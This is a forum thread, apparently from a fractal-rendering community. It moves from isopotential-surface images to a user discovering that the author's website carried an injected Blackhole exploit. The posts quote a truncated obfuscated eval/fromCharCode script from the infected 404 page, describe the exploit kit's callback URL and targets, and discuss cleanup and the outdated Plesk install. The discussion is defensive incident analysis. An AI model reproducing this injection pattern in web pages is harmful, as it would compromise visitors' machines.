Iso potential surfaces

[Feline]

So I wanted to do a little write-up about a class of DE I'd been tinkering with -- with math and code snippets and whatnot.

And after a couple weeks of futzing I decided that this will never get finished and instead I made a page with a quick explanation what it is I'm doing and a couple example images and I figure you can figure out the implementation yourself 

(I may post a bit of code here-n-there later, but cleaning up my horrible explosion-in-a-spaghetti-factory abominations is actually what is taking so long and almost dissuaded me from writing this at all).

The writeup can be found here: http://sgeier.net/fractals/projects/20120823Isopotentials/

Examples look like this

[Syntopia]

Great images! I like this one in particular: http://sgeier.net/fractals/projects/20120823Isopotentials/M9m2%20topview.jpg

Btw, I tried clicking some of your gallery links, but they all seem to 404 on my Firefox?

[subblue]

Very interesting, Sven!

I briefly touched on plotting the potential surface lines when debugging quite a while ago:
http://www.twitpic.com/10rpxu but having seen your images I'm going to have to look into it again

BTW, your website does seem to be doing something odd, the other pages only seem to work after being redirected to the 'catchup' page. Some very nice stuff there.

[Syntopia]

Virus warning.

I don't want to spread FUD, but I think the above site is affected by a virus. The Microsoft Security Essentials scanner found an infected webpage in my Chrome cache after visiting the page. It took me a while to realize which site gave the warning, but I tracked it down to the above site.

When clicking on the any of the broken links on the webpage, a 404 page is temporarily shown before reverting to the original page.
This page contains an injection for a Blackhole exploit:

Code:

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.sgeier.net/fractals/index.php">
<HTML>
<HEAD>
</head><body>

<h1>Ooops</h1>

<p>You should have been redirected to <a href="fractals/index.php">a
default catch-all page</a>. But appearently this doesn't quite
work. 

<p>Ooops. Sorry. Feel free to just click the link up there.
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123, <--- EXPLOIT BEGINS HERE

The last part injects and executes the Javascript exploit.

This is a very clever disguise - I tried several scanners:
http://scanurl.net/?u=http%3A%2F%2Fsgeier.net%2Ffractals%2Fprojects%2F20120823Isopotentials%2F&uesb=Check+This+URL#results

But only this one found the exploit: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2Fsgeier.net%2Ffractals%2Fprojects%2F20120823Isopotentials%2F

My guess is that the expoits deliberately breaks links (by removing the http:// part), in order to show the 404 page.

[Feline]

Huh - this is odd. I'll have to look into that. Thanks for the warning.

(The format of that page is decades-old hand-crafted html that I've been using for just about forever and that might have gone stale over time so I'm not surprised if links don't work and such -- but there shouldn't be exploits and such, so I'm a little worried. I'll report back after I poke around a bit...)

Edit:
Quite interesting: There was indeed a new file "index.html" superseding my original (that had been renamed to "index.htm" which of course won't be picked up by Apache, but will fool people who use windows software for webpage generation.) The "desired action" for a 404 was to just re-load the index.html file which then indeed grabbed the modified file.

The modified file is 22kb in size, and I can't quite tell what's in it since the moment I download it to my local machine to have a look my realtime scanner immediately neuters it. I removed it, put the old one in place, that *should* be it. (Forcing a re-scan at sucuri.net says it's clean now.)

Except: how the hell did that get there? sucuri.net tells me that there is an outdated version of plesk running on that host, so I'll be contacting my web-hosting folks to have a look at that. And how long has it been sitting there? And what did it do to those who touched it?

The "index.html" at my site should never really be reached, it is truly just the fallback for 404 errors. Any real stuff has a "real URL". This means those links being broken (fixed now; yes, stale html. One of these days I'll switch to a 'real' CMS) was the only way to really discover this problem.

Ugly.

The only vector to this directory that I can see would be through my web-host -- random passerby shouldn't be able to write into that directory. I, personally obviously didn't put it there intentionally. This makes me just a little be paranoid...

[slon_ru]

Very, very nice!!
I would like to have the software used for this!!! 

[Syntopia]

Except: how the hell did that get there? sucuri.net tells me that there is an outdated version of plesk running on that host, so I'll be contacting my web-hosting folks to have a look at that. And how long has it been sitting there? And what did it do to those who touched it?

The only vector to this directory that I can see would be through my web-host -- random passerby shouldn't be able to write into that directory. I, personally obviously didn't put it there intentionally. This makes me just a little be paranoid...

The most common way for websites to get infected is apparently by running a version of Plesk earlier than 11 - and your host was running Plesk 8 according to the virus scanners:
http://blog.unmaskparasites.com/2012/06/26/millions-of-website-passwords-stored-in-plain-text-in-plesk-panel/

Notice your password is stored in cleartext, and until your host updates Plesk anybody will be able to retrieve it again - even if you change it.

As for what happens for people who visits the site, there is a description here:
http://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/

One of the online virus-scanners could actually decompress the Javascript on your 404 page, and the code was identical to the code in the link above. It would redirect to a URL (generated from random numbers, seeded with time) updated every 12 hours and fetching http://URL/runforestrun?cid=botnet2

The Blackhole exploit will look for client-side vulnarabilities in older browser version, and older Flash and Java, and Adobe PDF reader installations. It is apparently possible to commercially buy access and install whatever software pleases you on infected machines. The URL above hints that infected machines may be placed in botnets.

If you did see the 404 page, the best way to check if you are infected is by virus scanning.
Personally I also use the sysinternals tools to check my machine: http://technet.microsoft.com/en-us/sysinternals/bb545027
AutoRuns - to check which programs are executed at startup
RootkitRevealer
TcpView - to check if my machines has suspicious net connections

[Feline]

Very, very nice!!
I would like to have the software used for this!!! 

Well, as you might have guessed from my posting in the fragmentarium forum, the software I used is of course Fragmentarium. 

I may get around to posting the shader fragment at some point, but this is a somewhat hairy implementation of a contour line plot algorithm I originally wrote in the eighties in Fortran, then ported to GLSL to write on the isopotential surfaces of the distance field -- and as usual I just wanted to make it work, not "be pretty". So I'd have to clean up the code by quite a bit before I'm comfortable publishing it and that turns out to be kinda tedious.

For now I wanted to make a couple pages showing the various ideas I've been tinkering with and giving people an idea how it was done and what it looks like - and when that's finished I may get around to adding code snippets and stuff (and I'm secretly hoping someone picks up the ball and comes up with an elegant implementation before I get there )

[Feline]

Well - I posted a "support request" to my web hosting folks to update plesk - let's see what happens.

For now I wrote myself a little script that uses wget to retrieve every html file once and compares the md5sums to a "known good" table - that should allow me to keep an eye on things at least semi-manually (say once a day or so).

If there was no other reason to start writing down/publishing some of the things I've been doing over the last couple years, catching this was already worth it... Thanks for doing all the hard sleuthing work for me :-)

(I have security essentials running on all my win-boxes, and it had indeed caught the junk in my web cache but never notified me. Do you have it set to inform you somehow when something is cleaned out/quarantained? Or did you just catch it by accident?)

[slon_ru]

I used is of course Fragmentarium. 

I just could not believe %-0

[Syntopia]

(I have security essentials running on all my win-boxes, and it had indeed caught the junk in my web cache but never notified me. Do you have it set to inform you somehow when something is cleaned out/quarantained? Or did you just catch it by accident?)

No, security essentials just popped up, and said that it found the infected file in Chrome's cache. Unfortunately this was some time after I visited the site.

I guess all this could have been easily avoided if the web hosting companies did a simple virus scan of the customers files :-)